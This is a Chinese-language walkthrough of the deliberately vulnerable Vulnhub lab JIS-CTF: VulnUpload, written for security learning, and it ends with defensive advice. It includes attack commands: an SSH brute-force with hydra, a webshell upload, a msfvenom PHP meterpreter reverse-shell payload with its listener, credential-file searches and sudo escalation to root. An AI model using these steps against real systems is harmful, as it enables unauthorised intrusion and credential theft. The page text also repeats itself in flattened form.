JIS-CTF_VulnUpload靶机攻略
字数 1304 2025-08-18 11:37:23

JIS-CTF: VulnUpload 靶机渗透测试完整指南

靶机概述

JIS-CTF: VulnUpload 是一个初级难度的 Vulnhub 靶机,包含5个flag,平均完成时间约1.5小时。该靶机运行Ubuntu系统,主要服务包括:

  • SSH (OpenSSH 7.2p2)
  • HTTP (Apache httpd 2.4.18)

环境准备

  1. 从Vulnhub下载靶机镜像:JIS-CTF: VulnUpload
  2. 导入VirtualBox后启动
  3. 确认靶机IP(通常通过DHCP自动获取)

渗透测试流程

1. 目标发现

使用nmap扫描本地网络,发现靶机IP:

nmap -sn 192.168.56.0/24

示例输出:

192.168.56.1 - 主系统IP
192.168.56.2 - DHCP服务器
192.168.56.5 - 本机(Kali)
192.168.56.6 - 靶机(JIS)

2. 服务枚举

对靶机进行详细扫描:

nmap -O -sV 192.168.56.6

扫描结果:

  • 22/tcp: OpenSSH 7.2p2
  • 80/tcp: Apache httpd 2.4.18
  • 操作系统: Ubuntu

3. 漏洞分析

SSH服务分析

  1. 尝试弱口令爆破:
hydra -L common_users.txt -P common_passwords.txt ssh://192.168.56.6
  1. 搜索已知漏洞:
searchsploit openssh 7.2p2

发现用户名枚举漏洞(但EXP不可靠)

Apache服务分析

searchsploit apache 2.4.18

仅发现内存泄漏漏洞,利用价值低

4. Web应用渗透

目录枚举

  1. 使用Burp Suite的Discover Content功能:

    • 设置仅扫描.php扩展名
    • 发现重要目录:/admin_area/, /uploaded_files/
  2. 使用dirsearch工具:

python3 dirsearch.py -u http://192.168.56.6 -e php

关键发现

  1. /admin_area/发现第一个flag:
flag{7412574125871236547895214}

同时获得凭据:admin/3v1l_H@ck3r

  1. /flag/发现第二个flag:
flag{8734509128730458630012095}

文件上传漏洞利用

  1. 使用获得的凭据登录/login.php

  2. 上传PHP webshell测试:

    • 上传成功但无回显
    • 确认上传目录为/uploaded_files/
  3. 生成MSF反弹shell:

msfvenom -p php/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f raw > shell.php
  1. 设置监听:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
exploit
  1. 访问上传的shell.php获取meterpreter会话

系统内信息收集

  1. 查找flag和提示:

    • /var/www/html/flag.txt(无权限)
    • /var/www/html/hint.txt
      第三个flag: flag{7645110034526579012345670}
      提示: 查看flag.txt需要technawi用户的密码
      
  2. 搜索technawi相关信息:

find / -name "*technawi*" 2>/dev/null
grep -r "technawi" / 2>/dev/null

/etc/mysql/conf.d/credentials.txt发现:

第四个flag: flag{7845658974123568974185412}
凭据: technawi/3vilH@ksor

5. 权限提升

  1. 使用获得的凭据SSH登录:
ssh technawi@192.168.56.6
  1. 查看flag.txt:
cat /var/www/html/flag.txt

获得第五个flag:

flag{5473215946785213456975249}
  1. 检查sudo权限:
sudo -l

发现可以使用sudo无需密码

  1. 提权至root:
sudo su

关键知识点总结

  1. 信息收集:nmap扫描、目录枚举、内容发现是渗透测试的基础
  2. 漏洞利用:文件上传漏洞是常见的Web应用漏洞
  3. 横向移动:通过发现的凭据在不同服务间尝试登录
  4. 权限提升:检查sudo权限、SUID文件等常见提权路径
  5. 工具使用:Burp Suite、dirsearch、msfvenom等工具的综合应用

防御建议

  1. 对文件上传功能实施严格的文件类型检查
  2. 避免在配置文件中存储明文凭据
  3. 限制sudo权限,避免普通用户无密码提权
  4. 定期更新服务软件以修复已知漏洞
  5. 实施最小权限原则,限制每个用户的访问范围

通过这个靶机的完整渗透过程,可以系统性地学习从信息收集到权限提升的完整攻击链,对于理解Web应用安全有很好的帮助。

JIS-CTF: VulnUpload 靶机渗透测试完整指南 靶机概述 JIS-CTF: VulnUpload 是一个初级难度的 Vulnhub 靶机,包含5个flag,平均完成时间约1.5小时。该靶机运行Ubuntu系统,主要服务包括: SSH (OpenSSH 7.2p2) HTTP (Apache httpd 2.4.18) 环境准备 从Vulnhub下载靶机镜像: JIS-CTF: VulnUpload 导入VirtualBox后启动 确认靶机IP(通常通过DHCP自动获取) 渗透测试流程 1. 目标发现 使用nmap扫描本地网络,发现靶机IP: 示例输出: 2. 服务枚举 对靶机进行详细扫描: 扫描结果: 22/tcp: OpenSSH 7.2p2 80/tcp: Apache httpd 2.4.18 操作系统: Ubuntu 3. 漏洞分析 SSH服务分析 尝试弱口令爆破: 搜索已知漏洞: 发现用户名枚举漏洞(但EXP不可靠) Apache服务分析 仅发现内存泄漏漏洞,利用价值低 4. Web应用渗透 目录枚举 使用Burp Suite的Discover Content功能: 设置仅扫描.php扩展名 发现重要目录: /admin_area/ , /uploaded_files/ 使用dirsearch工具: 关键发现 在 /admin_area/ 发现第一个flag: 同时获得凭据: admin/3v1l_H@ck3r 在 /flag/ 发现第二个flag: 文件上传漏洞利用 使用获得的凭据登录 /login.php 上传PHP webshell测试: 上传成功但无回显 确认上传目录为 /uploaded_files/ 生成MSF反弹shell: 设置监听: 访问上传的shell.php获取meterpreter会话 系统内信息收集 查找flag和提示: /var/www/html/flag.txt (无权限) /var/www/html/hint.txt : 搜索technawi相关信息: 在 /etc/mysql/conf.d/credentials.txt 发现: 5. 权限提升 使用获得的凭据SSH登录: 查看flag.txt: 获得第五个flag: 检查sudo权限: 发现可以使用sudo无需密码 提权至root: 关键知识点总结 信息收集 :nmap扫描、目录枚举、内容发现是渗透测试的基础 漏洞利用 :文件上传漏洞是常见的Web应用漏洞 横向移动 :通过发现的凭据在不同服务间尝试登录 权限提升 :检查sudo权限、SUID文件等常见提权路径 工具使用 :Burp Suite、dirsearch、msfvenom等工具的综合应用 防御建议 对文件上传功能实施严格的文件类型检查 避免在配置文件中存储明文凭据 限制sudo权限,避免普通用户无密码提权 定期更新服务软件以修复已知漏洞 实施最小权限原则,限制每个用户的访问范围 通过这个靶机的完整渗透过程,可以系统性地学习从信息收集到权限提升的完整攻击链,对于理解Web应用安全有很好的帮助。